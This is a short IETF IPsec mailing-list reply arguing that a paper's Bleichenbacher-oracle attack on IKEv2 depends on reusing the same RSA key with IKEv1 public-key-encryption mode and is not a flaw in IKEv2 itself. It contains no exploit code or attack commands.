Hi Scott, > Their argument is 'if you use the same RSA key for IKEv1 PKE authentication, > *and* IKEv2 authentication, then > you can use the Bleichenbacher Oracle within IKEv1 to attack a current IKEv2 > exchange' (see section 4.4 of the > paper).
So, this is not an attack against IKEv2 per se. Without running IKEv1 code with enabled (R)PKE the attack is impossible. So in my opinion the authors are not accurate claiming that this is attack against IKEv2 - after breaking RSA with Bleichenbacher Oracle in IKEv1 PKE mode they can use the results against *any* protocol that reuses broken key, can't they? Is there any weakness in IKEv2 as a protocol except that its RSA key is usually the same as in IKEv1? I believe the authors didn't demonstrate such a weakness... Regards, Valery. _______________________________________________ IPsec mailing list [email protected] https://www.ietf.org/mailman/listinfo/ipsec
